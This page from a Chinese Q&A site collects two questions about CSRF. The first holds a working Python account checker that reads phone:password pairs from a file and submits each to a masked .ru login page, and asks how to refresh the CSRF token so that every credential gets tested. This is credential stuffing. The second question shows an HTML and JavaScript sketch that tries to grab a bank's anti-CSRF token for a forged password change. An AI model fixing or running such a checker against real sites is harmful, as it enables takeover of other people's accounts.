主页 / 问题

问题[csrf]

Martin Hope
Myst1cal
Asked: 2022-08-22 15:20:37 +0800 CST
  • 0

我为该站点编写了一个检查器,该站点为每个新请求发送一个令牌

<meta name="csrf-token" content="YWkbF2WVwqUv1eQyuJcm_J1NDQwu8IqptT2w2i4SiBAlAVNyCaKjwBq5plbp0B-zyn5CP22f8N3vZcnqGWjgYQ==">

我的 python 代码看起来像这样

import requests
from bs4 import BeautifulSoup



file = open('1.txt').read().split('\n')


url = 'https://****.ru/auth/login'
headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'}

session = requests.Session()
session.headers.update(headers)

r = session.get(url)
soup = BeautifulSoup(r.content, 'html.parser')

csrf = soup.find('meta', {'name': 'csrf-token'})['content']

url_auth = 'https://****.ru/auth/login'

for account in file:
    phone = account.split(":")[0]
    password = account.split(":")[1]


    u = phone
    p = password





    payload = {
    '_csrf': csrf,
    'LoginForm[login]': phone,
    'LoginForm[password]': password,
    }

    r = session.post(url_auth, data=payload)


    print(r.text)

首次登录账户前的代码检查,其余账户被认为无效,我需要该行

csrf = soup.find('meta', {'name': 'csrf-token'})['content']

随每个新请求更新。请告诉我如何做到这一点,不要骂太多这是我生命中的第一个代码:)

python csrf
Martin Hope
user2264941
Asked: 2020-03-05 20:32:03 +0800 CST
  • 0

大家下午好,我读了很多关于 csrf 的文章,建议使用令牌来防止这种攻击: https ://learn.javascript.ru/csrf ,维基百科等。

但是什么是保护呢?如果用户登录到复杂的系统,比如网上银行,CSRF 的本质就在登录的复杂系统中。是什么阻止您获得正确形式的网上银行,从中提取必要的反 CSRF 令牌?

代码示例:

<form action="http://localhost/csrf/" method="GET">
    New password:<br />
    <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
    Confirm new password:<br />
    <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
    <br />
    <input type="submit" value="Change" name="Change">
    <input type="hidden" name='user_token' value='' />
</form>

<div id="token" style="display:none"><div>

<script type="text/javascript">
    xmlhttp=new XMLHttpRequest();
    xmlhttp.open("GET", "http://bank.com/", false);    
    xmlhttp.send();

    var token = document.getElementById("token");
    token.innerHTML = xmlhttp.responseText;
    tokens = document.getElementsByName('user_token');
    tokens[0].value = tokens[1].value;
</script>

那么什么是通证保护呢?

你还知道哪些保护方法?

csrf